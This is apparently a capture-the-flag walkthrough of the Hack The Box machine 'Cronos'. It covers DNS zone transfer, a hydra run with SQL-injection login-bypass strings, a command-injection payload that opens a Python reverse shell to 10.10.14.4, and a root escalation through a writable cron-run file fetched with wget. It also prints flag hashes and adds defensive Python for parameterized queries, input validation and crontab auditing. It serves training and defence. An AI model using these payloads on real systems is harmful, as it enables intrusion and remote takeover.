| Machine Name | Difficulty | OS | Logo |
|---|---|---|---|
| Cronos - HTB | Medium | Linux | |
Walkthrough
Let's start with an nmap scan.

```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
First I went to port 80 and found nothing there. So I tried to gather information from port 53 instead.

```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
>
```
Next I tried to enumerate all the hosts with a zone transfer.

```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# host -l -a cronos.htb 10.10.10.13
Trying "cronos.htb"
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26260
;; flags: qr aa ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;cronos.htb. IN AXFR
;; ANSWER SECTION:
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
Received 192 bytes from 10.10.10.13#53 in 83 ms
```
I added these hosts to my /etc/hosts and moved on.

Directory scans with gobuster and dirb turned up nothing of much importance, but I suspected the login form on admin.cronos.htb might be vulnerable to SQL injection. So I found a SQLi login-bypass wordlist online and fed it to hydra as both the user and password list. The page with the wordlist: https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# hydra -L sql.txt -P sql.txt admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-28 04:53:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 649636 login tries (l:806/p:806), ~40603 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[STATUS] 1588.00 tries/min, 1588 tries in 00:01h, 648048 to do in 06:49h, 16 active
[STATUS] 1611.33 tries/min, 4834 tries in 00:03h, 644802 to do in 06:41h, 16 active
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: admin
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: 1234
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: 123456
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: toor
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: password
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: root
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: test
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: guest
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or ''='
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: 'or string-length(name(.))<10 or'
[STATUS] 1729.00 tries/min, 12103 tries in 00:07h, 637533 to do in 06:09h, 16 active
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: admin
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: 123456
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: password
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: root
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: 1234
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: test
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: toor
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or ''='
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: guest
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: 'or string-length(name(.))<10 or'
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: admin
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: password
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: 123456
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: root
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: 1234
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: toor
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: test
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: guest
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or ''='
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: 'or string-length(name(.))<10 or'
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
```
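The hydra hits above all share one shape: a quote that closes the username literal followed by an `or` that is always true. As an added example (not code from the original post), here is that login pattern in Python with an in-memory sqlite3 table standing in for the site's database, beside the parameterized version that the same payloads cannot bypass. The table and credential are constructed.

```python
import sqlite3

# Constructed in-memory stand-in for the login table behind admin.cronos.htb.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")  # constructed


def login_vulnerable(username, password):
    """Builds the WHERE clause by string concatenation. A quote in the input
    closes the literal, so ' or 1 or ' turns the check into ... OR 1 OR ...,
    which is true for every row: exactly what hydra's hits point at."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    try:
        return _conn.execute(query).fetchone() is not None
    except sqlite3.OperationalError:  # unbalanced quotes: the app would just fail the login
        return False


def login_parameterized(username, password):
    """Same check with bound parameters. The values travel separately from the
    SQL text, so a quote is only data and the query shape never changes."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return _conn.execute(query, (username, password)).fetchone() is not None
```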
Great, now let's log in to the system. After logging in, I found a page that let us run commands. I sent the payload

```
8.8.8.8; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

and got a reverse shell.
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 40338
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```
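The command page accepted an address and everything after the `;` with it, which is the classic shell command injection. As an added example (not from the original post), here is the Python shape of such a page beside an allow-list validation plus argv-style invocation that leaves nothing for a shell to interpret. The ping command is my assumption of what the page ran; `shell_commands` only shows how a POSIX shell would split the vulnerable line.

```python
import ipaddress
import re
import shlex

# RFC 1123 hostname: labels of letters, digits and hyphens only, so no shell
# metacharacter can survive validation.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)

def build_ping_vulnerable(target):
    """The pattern behind the command page: the form value is pasted into a
    shell command line, so text after ';' becomes a second command."""
    return "ping -c 1 " + target

def shell_commands(command_line):
    """Split a line the way a POSIX shell does, at ';', to show what would run."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            commands.append(" ".join(current))
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(" ".join(current))
    return commands

def validate_target(target):
    """Allow-list: return the normalised target if it is an IP address or a
    hostname, otherwise None. ';', quotes and spaces can never pass."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target.lower()
    return None

def build_ping_safe(target):
    """Validated target passed as its own argv element. A list argv handed to
    subprocess.run never goes through /bin/sh, so even an unvalidated value
    could not be parsed as shell syntax; validation is defence in depth."""
    clean = validate_target(target)
    if clean is None:
        raise ValueError("rejected target: %r" % target)
    return ["ping", "-c", "1", clean]
```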
I was able to read the user flag right away.

```
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls
ls
noulis
www-data@cronos:/home$ cd noulis
cd noulis
www-data@cronos:/home/noulis$ ls
ls
user.txt
www-data@cronos:/home/noulis$ cat user.txt
cat user.txt
51d236438b333970dbba7dc3089be33b
```
While looking around inside, I saw that the artisan file was being run every minute with root privileges, and I also had write access to it. So I prepared a reverse shell, uploaded it to the machine in place of artisan, then started a listener and became root.

```
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
```

```
www-data@cronos:/var/www/laravel$ wget http://10.10.14.4/artisan
wget http://10.10.14.4/artisan
--2021-08-29 12:52:12-- http://10.10.14.4/artisan
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'artisan.1'
artisan.1 100%[===================>] 5.36K --.-KB/s in 0s
2021-08-29 12:52:12 (471 MB/s) - 'artisan.1' saved [5492/5492]
www-data@cronos:/var/www/laravel$ rm artisan
rm artisan
www-data@cronos:/var/www/laravel$ mv artisan.1 artisan
mv artisan.1 artisan
```
```
┌──(root💀kali)-[/opt/PEASS-ng/linPEAS]
└─# nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 55342
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
12:53:01 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
1703b8a3c9a8dde879942c79d02fd3a0
```
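The root cron job above executes a file that www-data could replace (the `rm` and `mv` worked because the directory itself was writable, not only the file). As an added example (not from the original post), here is the check a defender would script against /etc/crontab: list the jobs run as root and flag any absolute path in their command lines that a non-root user can write, or whose parent directory they can write. The crontab sample is constructed around the line found on the box; `stat_fn` is injectable so the logic can be tested without real root-owned files.

```python
import os
import re
import stat

# Constructed /etc/crontab sample; the artisan line is the one seen on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
* * * * * www-data /usr/bin/touch /tmp/heartbeat
"""
# System crontab line: five time fields (or an @special), user, then command.
_CRON_RE = re.compile(r"^(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
_PATH_RE = re.compile(r"(?<![\w./-])(/[\w./-]+)")  # absolute paths in a command

def parse_root_jobs(crontab_text):
    """Return the command strings of the jobs the system crontab runs as root."""
    jobs = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        m = _CRON_RE.match(line)
        if m and m.group("user") == "root":
            jobs.append(m.group("cmd"))
    return jobs

def writable_by_others(path):
    """True if a non-root user could change the path (non-root owner or a
    group/world write bit); None if it does not exist or cannot be stat'ed."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(crontab_text, stat_fn=writable_by_others):
    """Map each root job to the paths in its command that a non-root user could
    replace: the file itself, or its directory (enough to rm and mv a new one in)."""
    findings = {}
    for cmd in parse_root_jobs(crontab_text):
        risky = [p for p in _PATH_RE.findall(cmd)
                 if not p.startswith("/dev/")
                 and (stat_fn(p) or stat_fn(os.path.dirname(p)))]
        if risky:
            findings[cmd] = risky
    return findings
```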